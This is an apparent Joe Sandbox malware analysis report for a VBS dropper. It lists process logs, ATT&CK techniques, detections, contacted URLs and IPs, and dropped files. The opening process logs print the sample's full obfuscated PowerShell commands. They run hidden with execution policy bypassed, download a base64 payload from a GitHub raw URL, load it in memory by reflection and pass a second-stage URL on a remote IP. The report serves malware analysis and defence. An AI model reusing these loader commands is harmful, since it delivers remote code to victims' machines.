Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( (('sbourl '+'= u'+'nih'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'n'+'odet'+'ecton/nodet'+'ecto'+'n/'+'re'+'fs/head'+'s/main/detah'+'no'+'th-v.'+'t'+'xtu'+'ni; sb'+'oba'+'s'+'e6'+'4c'+'ontent = (ne'+'w-objec'+'t '+'s'+'yst'+'e'+'m'+'.net.w'+'ebclient).dow'+'nloadstr'+'ing'+'('+'sbourl'+'); sb'+'obinar'+'y'+'content '+'= [s'+'y'+'ste'+'m.co'+'n'+'v'+'ert'+']::fromb'+'a'+'s'+'e64s'+'tring'+'(sbo'+'base64c'+'o'+'ntent);'+' s'+'boas'+'sem'+'bly = [reflection.'+'assem'+'b'+'l'+'y]::'+'loa'+'d('+'sbobinaryconten'+'t); ['+'dnli'+'b.io.'+'home]'+'::vai'+'('+'hpitxt.rr'+'bd'+'l/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhpi, '+'hpidesativ'+'a'+'dohpi, '+'hp'+'id'+'e'+'s'+'at'+'ivado'+'hpi, h'+'pi'+'desativa'+'do'+'h'+'pi, '+'hp'+'iasp'+'net_regbrows'+'e'+'rshpi,'+' hpi'+'h'+'pi,'+'hpih'+'p'+'i)')-creplace 'uni',[char]39 -replace 'hpi',[char]34 -replace ([char]115+[char]66+[char]79),[char]36))"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrfbly6y09nu1blq1s0lde1ldi1xs1qt2lojycpkcaokcdzqk91cmwgjysnpsbvjysntklojysndhrwczonkycvl3jhdy4nkydnaxrodwinkyd1c2unkydyy29udccrj2vudc4nkydjb20nkycvjysnticrj29ezxqnkydly3rpbi9ob0rldccrj2vjde8nkydulycrj3jljysnznmvagvhzccrj3mvbwfpbi9ezxrhaccrj05vjysndggtvi4nkyd0jysnehrvjysntkk7ihncjysnt2jhjysncycrj2u2jysnnemnkydvbnrlbnqgpsaotmunkyd3lu9iamvjjysndcankydtjysnexn0jysnzscrj20nkycutmv0llcnkydlyknsawvudckurg93jysnbmxvywrtdhinkydpbmcnkycojysnc0jpdxjsjysnktsgc0inkydpymluyxinkyd5jysnq29udgvudcankyc9ifttjysnescrj3n0zscrj20uq28nkydujysndicrj2vydccrj106okzyb21cjysnyscrj3mnkydlnjrtjysndhjpbmcnkycoc0jpjysnymfzzty0qycrj28nkydudgvudck7jysnihmnkydct2fzjysnc2vtjysnymx5id0gw1jlzmxly3rpb24ujysnqxnzzw0nkydijysnbccrj3ldojonkydmb2enkydkkccrj3nct2jpbmfyeunvbnrlbicrj3qpoybbjysnzg5sascrj2iusu8ujysnsg9tzv0nkyc6olzbsscrjygnkydouel0ehquulinkydcrccrj0wvmdu0lzqzjysnms4nkyc5jysnmicrjzeunjqujysnodknkycxly8nkyc6chr0aghqsswgjysnafbjzgvzyxrpdicrj2enkydkb2hqsswgjysnafankydjzccrj2unkydzjysnyxqnkydpdmfkbycrj2hqsswgaccrj1bjjysnzgvzyxrpdmenkydkbycrj2gnkydqsswgjysnafankydjyxnwjysnbmv0x3jlz2jyb3dzjysnzscrj3jzafbjlccrjyboueknkydojysnueksjysnafbjaccrj1ankydjkscplunszvbsqwnficdvtkknlftdagfsxtm5icatcmvqtefjzsagj2hqsscsw0noyvjdmzqgic1yzvbmqwnlicaow0noyvjdmte1k1tdagfsxty2k1tdagfsxtc5ksxbq2hhul0znikp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'')( (('sbourl '+'= u'+'nih'+'ttps:'+'//raw.'+'github'+'use'+'rcont'+'ent.'+'com'+'/'+'n'+'odet'+'ecton/nodet'+'ecto'+'n/'+'re'+'fs/head'+'s/main/detah'+'no'+'th-v.'+'t'+'xtu'+'ni; sb'+'oba'+'s'+'e6'+'4c'+'ontent = (ne'+'w-objec'+'t '+'s'+'yst'+'e'+'m'+'.net.w'+'ebclient).dow'+'nloadstr'+'ing'+'('+'sbourl'+'); sb'+'obinar'+'y'+'content '+'= [s'+'y'+'ste'+'m.co'+'n'+'v'+'ert'+']::fromb'+'a'+'s'+'e64s'+'tring'+'(sbo'+'base64c'+'o'+'ntent);'+' s'+'boas'+'sem'+'bly = [reflection.'+'assem'+'b'+'l'+'y]::'+'loa'+'d('+'sbobinaryconten'+'t); ['+'dnli'+'b.io.'+'home]'+'::vai'+'('+'hpitxt.rr'+'bd'+'l/054/43'+'1.'+'9'+'2'+'1.64.'+'89'+'1//'+':ptthhpi, '+'hpidesativ'+'a'+'dohpi, '+'hp'+'id'+'e'+'s'+'at'+'ivado'+'hpi, h'+'pi'+'desativa'+'do'+'h'+'pi, '+'hp'+'iasp'+'net_regbrows'+'e'+'rshpi,'+' hpi'+'h'+'pi,'+'hpih'+'p'+'i)')-creplace 'uni',[char]39 -replace 'hpi',[char]34 -replace ([char]115+[char]66+[char]79),[char]36))"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
uLfuBVyZFV.vbs8%ReversingLabsWin32.Trojan.Generic
uLfuBVyZFV.vbs6%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
raw.githubusercontent.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
http://198.46.129.1340%VirustotalBrowse
https://github.com/Pester/Pester1%VirustotalBrowse
https://raw.githubusercontent.com0%VirustotalBrowse
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI;0%VirustotalBrowse
http://198.46.129.134/450/LDBRR.txt0%VirustotalBrowse
http://raw.githubusercontent.com0%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
raw.githubusercontent.com
185.199.108.133
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalseunknown
http://198.46.129.134/450/LDBRR.txtfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontent.compowershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 00000006.00000002.1348872454.00000177582C9000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://198.46.129.134powershell.exe, 00000006.00000002.1348872454.00000177575DE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://contoso.com/powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1364577618.0000017767224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://raw.githubusercontent.compowershell.exe, 00000006.00000002.1348872454.0000017758890000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://contoso.com/Iconpowershell.exe, 00000006.00000002.1348872454.0000017758B54000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://oneget.orgXpowershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontpowershell.exe, 00000006.00000002.1348872454.000001775888B000.00000004.00000800.00020000.00000000.sdmpfalse
    		unknown
    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtUNI;powershell.exe, 00000006.00000002.1348872454.00000177573D3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1396024247.000001C822913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1396024247.000001C8228EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1396024247.000001C822940000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1348872454.00000177571B1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1348872454.0000017758ACE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://oneget.orgpowershell.exe, 00000006.00000002.1348872454.00000177588D9000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    185.199.108.133
    		raw.githubusercontent.comNetherlands
    		54113FASTLYUSfalse
    198.46.129.134
    		unknownUnited States
    		36352AS-COLOCROSSINGUSfalse

    General Information

    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1523829
    Start date and time:2024-10-02 05:27:21 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 37s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:13
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:uLfuBVyZFV.vbs
    renamed because original name is a hash value
    Original Sample Name:79c7020002b461319a5b25a22be2c4fabfcc5bcef788530d380ebd65872f4d9a.vbs
    Detection:MAL
    Classification:mal100.expl.evad.winVBS@6/5@1/2
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 10
    • Number of non-executed functions: 1
    Cookbook Comments:
    • Found application associated with file extension: .vbs

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 2980 because it is empty
    • Execution Graph export aborted for target powershell.exe, PID 7304 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    23:28:20API Interceptor38x Sleep call for process: powershell.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    185.199.108.133iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
      mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
        http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
          asegura.vbsGet hashmaliciousRemcosBrowse
            tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
              SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                https://krakenqplogin.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                  https://trezor-docs-info.github.io/Get hashmaliciousHTMLPhisherBrowse
                    http://bafybeifqgf7hacp4ugl6xk57ans3phuwnlp3z3gnzdxkrgb5rfaoestwfy.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                      http://gasbot-demos.vercel.app/Get hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        raw.githubusercontent.comWW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 185.199.108.133
                        00#U2800.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        asegurar.vbsGet hashmaliciousRemcosBrowse
                        • 185.199.110.133
                        dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                        • 185.199.110.133
                        asegura.vbsGet hashmaliciousRemcosBrowse
                        • 185.199.108.133
                        R183nzNa89.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                        • 185.199.109.133

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AS-COLOCROSSINGUS2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                        • 107.172.130.147
                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                        • 107.172.148.248
                        CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        CEjWMdiJnR.exeGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        8CRB0iJuy1.dllGet hashmaliciousDanaBotBrowse
                        • 23.95.182.47
                        CANADAXORDER.xlsGet hashmaliciousSnake KeyloggerBrowse
                        • 172.245.123.6
                        Shipping Documents.xlsGet hashmaliciousRemcosBrowse
                        • 104.168.32.148
                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.28227.30541.rtfGet hashmaliciousRemcosBrowse
                        • 104.168.7.8
                        Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
                        • 104.168.7.8
                        FASTLYUSWW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                        • 185.199.108.133
                        https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                        • 151.101.2.137
                        http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                        • 151.101.194.137
                        http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                        • 185.199.110.154
                        00#U2800.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.66.137

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0evr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                        • 185.199.108.133
                        f4576JaIo9.vbsGet hashmaliciousPureLog StealerBrowse
                        • 185.199.108.133
                        WW8kzvnphl.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                        • 185.199.108.133
                        qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                        • 185.199.108.133
                        2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                        • 185.199.108.133
                        ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                        • 185.199.108.133
                        0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                        • 185.199.108.133
                        PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 185.199.108.133

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.773832331134527
                        Encrypted:false
                        SSDEEP:3:Nlllulqtl:NllUO
                        MD5:B855D68D383D9FD249102892617B09C5
                        SHA1:6A39BB7ADE083CA432D97AF9C9E97B48FD5D38F3
                        SHA-256:42B89600A0F5480C0A5E6EA09D866291AFE991B0D18FEDD7A52C1E058F05AFFC
                        SHA-512:66F755EB9A5028B72542EF51856431E3CEF7FC618F748D27D8FE727DDA1CB6DE429C7ADDDB5A851F32B650DF4D24A1BB207FE58E7A239DE976B3BD33EE82B1A6
                        Malicious:false
                        Reputation:low
                        Preview:@...e...........................................................

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s25lclyh.n15.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thwqgli0.33f.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ub5kjkxb.00x.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtgdgi5j.edf.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

